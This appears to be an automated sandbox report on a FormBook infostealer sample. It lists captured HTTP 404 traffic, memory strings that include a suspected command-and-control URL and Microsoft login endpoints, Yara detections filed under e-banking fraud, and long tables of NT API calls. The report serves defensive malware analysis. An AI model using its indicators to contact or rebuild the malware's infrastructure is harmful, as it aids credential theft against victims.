3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 04:22:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 04:22:59 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 04:23:02 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 04:23:04 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: C6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002621000.00000004.00000800.00020000.00000000.sdmp, zdDlscHlw.exe, 0000000A.00000002.1800123427.00000000031E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: mDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hm35s.top
                Source: mDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hm35s.top/ebw6/
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000011.00000003.2064033264.00000000082D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033u7#G
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0042C843 NtClose,9_2_0042C843
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2B60 NtClose,LdrInitializeThunk,9_2_011C2B60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_011C2DF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_011C2C70
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C35C0 NtCreateMutant,LdrInitializeThunk,9_2_011C35C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C4340 NtSetContextThread,9_2_011C4340
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C4650 NtSuspendThread,9_2_011C4650
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2B80 NtQueryInformationFile,9_2_011C2B80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BA0 NtEnumerateValueKey,9_2_011C2BA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BF0 NtAllocateVirtualMemory,9_2_011C2BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BE0 NtQueryValueKey,9_2_011C2BE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AB0 NtWaitForSingleObject,9_2_011C2AB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AD0 NtReadFile,9_2_011C2AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AF0 NtWriteFile,9_2_011C2AF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D10 NtMapViewOfSection,9_2_011C2D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D00 NtSetInformationFile,9_2_011C2D00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D30 NtUnmapViewOfSection,9_2_011C2D30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DB0 NtEnumerateKey,9_2_011C2DB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DD0 NtDelayExecution,9_2_011C2DD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C00 NtQueryInformationProcess,9_2_011C2C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C60 NtCreateKey,9_2_011C2C60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CA0 NtQueryInformationToken,9_2_011C2CA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CC0 NtQueryVirtualMemory,9_2_011C2CC0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CF0 NtOpenProcess,9_2_011C2CF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F30 NtCreateSection,9_2_011C2F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F60 NtCreateProcessEx,9_2_011C2F60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F90 NtProtectVirtualMemory,9_2_011C2F90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FB0 NtResumeThread,9_2_011C2FB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FA0 NtQuerySection,9_2_011C2FA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FE0 NtCreateFile,9_2_011C2FE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2E30 NtWriteVirtualMemory,9_2_011C2E30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2E80 NtReadVirtualMemory,9_2_011C2E80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2EA0 NtAdjustPrivilegesToken,9_2_011C2EA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2EE0 NtQueueApcThread,9_2_011C2EE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3010 NtOpenDirectoryObject,9_2_011C3010
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3090 NtSetValueKey,9_2_011C3090
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C39B0 NtGetContextThread,9_2_011C39B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3D10 NtOpenProcessToken,9_2_011C3D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3D70 NtOpenThread,9_2_011C3D70
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_0243D3A40_2_0243D3A4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4A6000_2_06A4A600
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A492B00_2_06A492B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A48E780_2_06A48E78
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4AFA00_2_06A4AFA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4AFB00_2_06A4AFB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A48A400_2_06A48A40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_0A090C000_2_0A090C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004186B39_2_004186B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040281F9_2_0040281F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004028209_2_00402820
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E0D39_2_0040E0D3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004100E39_2_004100E3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004168A39_2_004168A3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004031509_2_00403150
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E2179_2_0040E217
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E2239_2_0040E223
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004024E09_2_004024E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040FEC39_2_0040FEC3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0042EEA39_2_0042EEA3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040FEBA9_2_0040FEBA
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011801009_2_01180100
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A1189_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012181589_2_01218158
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012501AA9_2_012501AA
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012481CC9_2_012481CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012220009_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A3529_2_0124A352
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012503E69_2_012503E6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F09_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012302749_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012102C09_2_012102C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011905359_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012505919_2_01250591
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012344209_2_01234420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012424469_2_01242446
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123E4F69_2_0123E4F6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B47509_2_011B4750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011907709_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118C7C09_2_0118C7C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AC6E09_2_011AC6E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A69629_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0125A9A69_2_0125A9A6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A09_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119A8409_2_0119A840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011928409_2_01192840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011768B89_2_011768B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE8F09_2_011BE8F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124AB409_2_0124AB40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01246BD79_2_01246BD7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA809_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119AD009_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122CD1F9_2_0122CD1F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A8DBF9_2_011A8DBF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118ADE09_2_0118ADE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190C009_2_01190C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230CB59_2_01230CB5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180CF29_2_01180CF2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01232F309_2_01232F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B0F309_2_011B0F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D2F289_2_011D2F28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01204F409_2_01204F40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120EFA09_2_0120EFA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182FC89_2_01182FC8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119CFE09_2_0119CFE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124EE269_2_0124EE26
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190E599_2_01190E59
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2E909_2_011A2E90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124CE939_2_0124CE93
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124EEDB9_2_0124EEDB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0125B16B9_2_0125B16B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117F1729_2_0117F172
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C516C9_2_011C516C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119B1B09_2_0119B1B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F0E09_2_0124F0E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012470E99_2_012470E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011970C09_2_011970C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123F0CC9_2_0123F0CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124132D9_2_0124132D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117D34C9_2_0117D34C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D739A9_2_011D739A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011952A09_2_011952A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012312ED9_2_012312ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AB2C09_2_011AB2C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012475719_2_01247571
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122D5B09_2_0122D5B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F43F9_2_0124F43F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011814609_2_01181460
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F7B09_2_0124F7B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012416CC9_2_012416CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012259109_2_01225910
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011999509_2_01199950
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AB9509_2_011AB950
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FD8009_2_011FD800
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011938E09_2_011938E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FB769_2_0124FB76
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AFB809_2_011AFB80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01205BF09_2_01205BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011CDBF99_2_011CDBF9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01203A6C9_2_01203A6C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01247A469_2_01247A46
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FA499_2_0124FA49
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01231AA39_2_01231AA3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122DAAC9_2_0122DAAC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D5AA09_2_011D5AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123DAC69_2_0123DAC6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01247D739_2_01247D73
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01193D409_2_01193D40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01241D5A9_2_01241D5A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AFDC09_2_011AFDC0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01209C329_2_01209C32
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FCF29_2_0124FCF2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FF099_2_0124FF09
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01191F929_2_01191F92
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FFB19_2_0124FFB1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01199EB09_2_01199EB0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_0176D3A410_2_0176D3A4
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141010015_2_01410100
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0146600015_2_01466000
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014A02C015_2_014A02C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142053515_2_01420535
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0144475015_2_01444750
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142077015_2_01420770
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141C7C015_2_0141C7C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143C6E015_2_0143C6E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143696215_2_01436962
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014229A015_2_014229A0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142A84015_2_0142A840
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142284015_2_01422840
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0144E8F015_2_0144E8F0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145889015_2_01458890
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014068B815_2_014068B8
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141EA8015_2_0141EA80
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142ED7A15_2_0142ED7A
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142AD0015_2_0142AD00
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01428DC015_2_01428DC0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141ADE015_2_0141ADE0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01438DBF15_2_01438DBF
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01420C0015_2_01420C00
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01410CF215_2_01410CF2
